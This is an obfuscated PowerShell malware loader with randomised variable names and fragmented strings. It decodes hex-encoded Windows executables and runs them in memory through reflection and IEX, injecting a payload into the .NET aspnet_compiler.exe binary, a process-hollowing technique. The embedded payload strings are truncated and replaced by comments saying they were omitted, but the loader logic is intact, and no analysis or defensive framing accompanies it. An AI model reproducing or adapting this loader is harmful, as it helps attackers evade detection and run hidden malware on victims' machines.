$VOPVITQVJHENFGBTVHWQCB = '4D5A9----3-------4------FFFF----B8...------------'.Replace("-","0") # NOTE: The actual 32796-character Base64 string omitted for readability.
[String]$ROCLEBASGLQTJKOXPYQHTU= $VOPVITQVJHENFGBTVHWQCB
Function HB {
    [CmdletBinding()]
    [OutputType([byte[]])]
    param(
        [Parameter(Mandatory=$true)] [String]$NKEKXETXQOZCCCZAPIABJW
    )
    $JNFPHLBFVBYBYQWVEETXND = New-Object -TypeName byte[] -ArgumentList ($NKEKXETXQOZCCCZAPIABJW.Length / 2)
    for ($NHUIZKRVPPIXQTIWGCKEBC = 0; $NHUIZKRVPPIXQTIWGCKEBC -lt $NKEKXETXQOZCCCZAPIABJW.Length; $NHUIZKRVPPIXQTIWGCKEBC += 2) {
        $JNFPHLBFVBYBYQWVEETXND[$NHUIZKRVPPIXQTIWGCKEBC / 2] = [Convert]::ToByte($NKEKXETXQOZCCCZAPIABJW.Substring($NHUIZKRVPPIXQTIWGCKEBC, 2), 16)
    }
    return [byte[]]$JNFPHLBFVBYBYQWVEETXND
}
[String]$TPTYEPSCWWTVJHYHISSENP='4D5A9----3-------4...--------'.Replace("-","0") # NOTE: The actual 97280-character Base64 string omitted for readability.
[Byte[]]$HWXGLIACJLREOVRHPAYHIU=HB $TPTYEPSCWWTVJHYHISSENP
[Byte[]]$DRSACWHALXVXXEPJBPRTHA= HB $ROCLEBASGLQTJKOXPYQHTU
$ZLYOLZOBVKWIPSVSKDIANO = 'F.B'
$THWQTCXXLESVOIJHDZLJVK = 'I'
$AHSSFYBKVZZKYDUPGJEEWB ='GJTHXBNBWFPKHKJUDZBSYTQ'.Replace('JTHXBNBWFPKHKJUDZBSYTQ','e')
$GJOFTBQHOJLAXHIJYGVBYV = 'DNZCZYNZSZBWZEHKDYKGXNTy'.Replace('DNZCZYNZSZBWZEHKDYKGXN','t')
$RVWXUUTVPXPZBYOQQNLOLU = 'LOTWABVLXILJJGQWTSECDDe'.Replace('LOTWABVLXILJJGQWTSECDD','p')
$QJCAEEUJTESDPKHOSAOLEF = $AHSSFYBKVZZKYDUPGJEEWB+$GJOFTBQHOJLAXHIJYGVBYV+$RVWXUUTVPXPZBYOQQNLOLU
$OQGERYHVJVKCVHNJTWDCFI = 'I';$WUXVKSISQQRPTXTNBQNIGX = 'n';$AHPRITEFVISYEIOKIEEAYV = 'vo';$ORCVADUESABSZQFUVPRROA = 'ke';$FVXOJOAVLRKNTPJJITFWLA = $OQGERYHVJVKCVHNJTWDCFI+$WUXVKSISQQRPTXTNBQNIGX+$AHPRITEFVISYEIOKIEEAYV+$ORCVADUESABSZQFUVPRROA
$IAYBBOGJARUXTUILKKPZFN = "G";$UPHOCWYAGWHFXESZABHTQX = "e";$KBXOBJVSZGEOKXLFJHINHT = "t";$IGKYADSKULBKVGHJESXVIN = "MFLSTRIIJAGTSHKSSJQVIBDod".Replace("FLSTRIIJAGTSHKSSJQVIBD","eth");
$AKGODSVTBAFRULJXWJFIJA =$IAYBBOGJARUXTUILKKPZFN+$UPHOCWYAGWHFXESZABHTQX+$KBXOBJVSZGEOKXLFJHINHT+$IGKYADSKULBKVGHJESXVIN
$JKFCPRLQVWUUDYVAAYQOIS = 'C:\WFIGBLGWAKNIZAZPHXGROGCos'.Replace("FIGBLGWAKNIZAZPHXGROGC","indows\Micr")
$LQBXENLGRDVIWNFCIGQUHV = 'oft.NEIZWGPKYENPSBZLGTVSLNEY319'.Replace("IZWGPKYENPSBZLGTVSLNEY","T\Framework\v4.0.30")
$TDVIFPBFCBDXWFBHWLGOVG = '\aspnet_compiler.exe';$OOTVRVVLIWTJXUBZPWFHZN = $JKFCPRLQVWUUDYVAAYQOIS+$LQBXENLGRDVIWNFCIGQUHV+$TDVIFPBFCBDXWFBHWLGOVG
$DYBQBZHGDYQFIGRSUWSLFF = 'L';$DHZDFUWHSOXPSBNRBRVAPN='a';$LZAVOBYIRFWZQZVCTGHPQB='d';$JYNODSXHCPOWGPYITUHRJD= 'o';$ZVCYAERHJVYSWGDUFOSRJK = $DYBQBZHGDYQFIGRSUWSLFF+$JYNODSXHCPOWGPYITUHRJD+$DHZDFUWHSOXPSBNRBRVAPN+$LZAVOBYIRFWZQZVCTGHPQB;
$WDOGVFNDTUKXLWJKBSLOCL='$nUll'
$CCOFFVDTLOTOCTCRTJGCAB = "[Re";$UYTGATLQARGFXJYIQWQQXE ="flect";$DWYIGZJVANSVFRKQTKZLFQ ="ion.Assembly]";$AYPPVVJJXARRHEOKGFJCLF = ($CCOFFVDTLOTOCTCRTJGCAB,$UYTGATLQARGFXJYIQWQQXE,$DWYIGZJVANSVFRKQTKZLFQ -Join '')|I`E`X
$BBCEXNVHYPJDIQBYCFLURN = $AYPPVVJJXARRHEOKGFJCLF::$ZVCYAERHJVYSWGDUFOSRJK($HWXGLIACJLREOVRHPAYHIU);
$QRZJAWHVFCKNCSHOYHLWIK = '$BBCEXNVHYPJDIQBYCFLURN.$QJCAEEUJTESDPKHOSAOLEF($ZLYOLZOBVKWIPSVSKDIANO).$AKGODSVTBAFRULJXWJFIJA($THWQTCXXLESVOIJHDZLJVK).$FVXOJOAVLRKNTPJJITFWLA';
$SIUEIGTLDKOCVDHNGDOHJF = '($WDOGVFNDTUKXLWJKBSLOCL,[object[]] ($OOTVRVVLIWTJXUBZPWFHZN,$DRSACWHALXVXXEPJBPRTHA))';
$NKEKXETXQOZCCCZAPIABJW=($QRZJAWHVFCKNCSHOYHLWIK,$SIUEIGTLDKOCVDHNGDOHJF -Join '')|I`E`X
